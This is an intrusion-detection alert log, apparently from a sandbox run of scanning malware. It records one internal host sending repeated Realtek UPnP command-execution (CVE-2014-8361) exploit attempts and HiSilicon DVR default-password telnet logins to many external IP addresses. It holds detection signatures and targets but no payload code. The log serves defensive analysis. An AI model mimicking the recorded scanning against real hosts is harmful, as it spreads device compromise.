Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42006 -> 91.76.168.63:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42010 -> 91.76.168.63:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43554
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:53144
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51422 -> 45.120.206.159:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51422 -> 45.120.206.159:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49978 -> 45.127.162.102:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49978 -> 45.127.162.102:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45072 -> 45.207.63.40:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45072 -> 45.207.63.40:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41756 -> 45.195.10.90:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41756 -> 45.195.10.90:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41760 -> 45.195.10.90:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43554
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43554
Source: Traffic	Snort IDS: 716 INFO TELNET access 41.60.156.81:23 -> 192.168.2.23:47610
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35666 -> 45.126.231.87:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35666 -> 45.126.231.87:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33618 -> 91.200.120.129:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55814 -> 91.77.148.18:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:55814 -> 91.77.148.18:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:55818 -> 91.77.148.18:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56644 -> 45.138.68.86:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56644 -> 45.138.68.86:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:43982 -> 45.158.21.156:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:43982 -> 45.158.21.156:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34222 -> 45.43.238.154:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34222 -> 45.43.238.154:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56418 -> 45.250.173.40:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56418 -> 45.250.173.40:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43630
Source: Traffic	Snort IDS: 716 INFO TELNET access 12.132.185.90:23 -> 192.168.2.23:35490
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.250.139.253:23 -> 192.168.2.23:35814
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.250.139.253:23 -> 192.168.2.23:35814
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35668 -> 185.225.195.166:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:35668 -> 185.225.195.166:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33852 -> 45.127.160.139:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33852 -> 45.127.160.139:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:35672 -> 185.225.195.166:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:53222
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43630
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43630
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.132.185.90:23 -> 192.168.2.23:35490
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.132.185.90:23 -> 192.168.2.23:35490
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.249.147.18:23 -> 192.168.2.23:58436
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.249.147.18:23 -> 192.168.2.23:58436
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49114 -> 45.113.2.3:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49114 -> 45.113.2.3:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60430 -> 185.235.180.145:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60430 -> 185.235.180.145:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60422 -> 185.233.80.129:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60422 -> 185.233.80.129:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60440 -> 185.235.180.145:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60432 -> 185.233.80.129:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:57980 -> 45.43.239.39:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:57980 -> 45.43.239.39:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52530 -> 91.200.120.67:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45416 -> 45.115.241.9:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45416 -> 45.115.241.9:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 64.85.48.118:23 -> 192.168.2.23:33552
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 64.85.48.118:23 -> 192.168.2.23:33552
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:54784 -> 92.180.159.76:23
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43746
Source: Traffic	Snort IDS: 716 INFO TELNET access 12.132.185.90:23 -> 192.168.2.23:35612
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:47584 -> 45.41.87.7:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:47584 -> 45.41.87.7:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:53350
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43746
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43746
Source: Traffic	Snort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 185.117.83.97: -> 192.168.2.23:
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.132.185.90:23 -> 192.168.2.23:35612
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.132.185.90:23 -> 192.168.2.23:35612
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 209.166.92.105:23 -> 192.168.2.23:58046
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 209.166.92.105:23 -> 192.168.2.23:58046
Source: Traffic	Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:60820
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44276 -> 45.41.93.96:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44276 -> 45.41.93.96:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38550 -> 45.42.95.76:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38550 -> 45.42.95.76:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38806 -> 185.133.76.118:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:38806 -> 185.133.76.118:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44512 -> 91.76.221.44:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44512 -> 91.76.221.44:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:38810 -> 185.133.76.118:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44516 -> 91.76.221.44:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 130.193.121.182:23 -> 192.168.2.23:43818
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:60820
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.186.40.42:23 -> 192.168.2.23:60836
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.186.40.42:23 -> 192.168.2.23:60836
Source: Traffic	Snort IDS: 716 INFO TELNET access 12.132.185.90:23 -> 192.168.2.23:35694
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:53422
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:35694 -> 12.132.185.90:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 130.193.121.182:23 -> 192.168.2.23:43818
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 130.193.121.182:23 -> 192.168.2.23:43818
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53182 -> 45.158.20.52:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53182 -> 45.158.20.52:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:60900
Source: Traffic	Snort IDS: 716 INFO TELNET access 41.60.156.81:23 -> 192.168.2.23:47878
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:60900 -> 189.112.111.254:23
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.132.185.90:23 -> 192.168.2.23:35694
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.132.185.90:23 -> 192.168.2.23:35694
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:35168 -> 2.196.131.42:23
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58264 -> 45.152.216.70:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58264 -> 45.152.216.70:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39908 -> 45.195.9.140:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39908 -> 45.195.9.140:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:60900
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58596 -> 45.133.119.108:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58596 -> 45.133.119.108:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58598 -> 45.133.119.108:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:60978
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37414 -> 45.115.237.160:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37414 -> 45.115.237.160:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 125.16.14.102:23 -> 192.168.2.23:53524
Source: Traffic	Snort IDS: 716 INFO TELNET access 12.132.185.90:23 -> 192.168.2.23:35800
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52734 -> 185.242.232.109:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:52734 -> 185.242.232.109:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60204 -> 91.77.213.224:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:60204 -> 91.77.213.224:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:60208 -> 91.77.213.224:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:52738 -> 185.242.232.109:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58506 -> 91.76.227.42:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:58506 -> 91.76.227.42:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:58508 -> 91.76.227.42:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:60978
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.132.185.90:23 -> 192.168.2.23:35800
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.132.185.90:23 -> 192.168.2.23:35800
Source: Traffic	Snort IDS: 2027973 ET EXPLOIT HiSilicon DVR - Default Telnet Root Password Inbound 192.168.2.23:36156 -> 14.250.139.253:23
Source: Traffic	Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:32782
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.250.139.253:23 -> 192.168.2.23:36156
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.250.139.253:23 -> 192.168.2.23:36156
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34670 -> 91.78.78.126:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34670 -> 91.78.78.126:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37990 -> 185.147.57.109:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:37990 -> 185.147.57.109:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34680 -> 91.78.78.126:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:37994 -> 185.147.57.109:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:34742 -> 45.121.57.150:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:34742 -> 45.121.57.150:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41400 -> 45.124.201.26:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41400 -> 45.124.201.26:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42850 -> 45.33.242.186:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42850 -> 45.33.242.186:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39702 -> 45.41.93.77:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39702 -> 45.41.93.77:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41416 -> 45.124.201.26:52869
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:32782
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:41654 -> 45.42.86.88:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:41654 -> 45.42.86.88:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51620 -> 185.142.143.64:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:51620 -> 185.142.143.64:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:44520 -> 45.250.172.36:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:44520 -> 45.250.172.36:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 14.249.147.18:23 -> 192.168.2.23:58760
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 14.249.147.18:23 -> 192.168.2.23:58760
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:51628 -> 185.142.143.64:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 12.132.185.90:23 -> 192.168.2.23:35908
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39498 -> 91.78.44.126:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:39498 -> 91.78.44.126:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 64.85.48.118:23 -> 192.168.2.23:33864
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 64.85.48.118:23 -> 192.168.2.23:33864
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:39502 -> 91.78.44.126:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:56918 -> 45.254.24.180:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:56918 -> 45.254.24.180:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53696 -> 185.114.78.45:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53696 -> 185.114.78.45:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53160 -> 45.42.86.243:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:53160 -> 45.42.86.243:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:53706 -> 185.114.78.45:52869
Source: Traffic	Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:32888
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33774 -> 185.229.200.212:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:33774 -> 185.229.200.212:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45424 -> 91.77.218.117:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:45424 -> 91.77.218.117:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49110 -> 45.152.216.217:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:49110 -> 45.152.216.217:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:45428 -> 91.77.218.117:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:33780 -> 185.229.200.212:52869
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:49118 -> 45.152.216.217:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 12.132.185.90:23 -> 192.168.2.23:35908
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 12.132.185.90:23 -> 192.168.2.23:35908
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 192.24.49.52:23 -> 192.168.2.23:36092
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 192.24.49.52:23 -> 192.168.2.23:36092
Source: Traffic	Snort IDS: 492 INFO TELNET login failed 189.112.111.254:23 -> 192.168.2.23:32888
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 209.166.92.105:23 -> 192.168.2.23:58372
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 209.166.92.105:23 -> 192.168.2.23:58372
Source: Traffic	Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.23:42818 -> 45.134.145.252:52869
Source: Traffic	Snort IDS: 2025132 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 192.168.2.23:42818 -> 45.134.145.252:52869
Source: Traffic	Snort IDS: 1251 INFO TELNET Bad Login 192.24.49.52:23 -> 192.168.2.23:36100
Source: Traffic	Snort IDS: 718 INFO TELNET login incorrect 192.24.49.52:23 -> 192.168.2.23:36100
Source: Traffic	Snort IDS: 716 INFO TELNET access 189.112.111.254:23 -> 192.168.2.23:32918
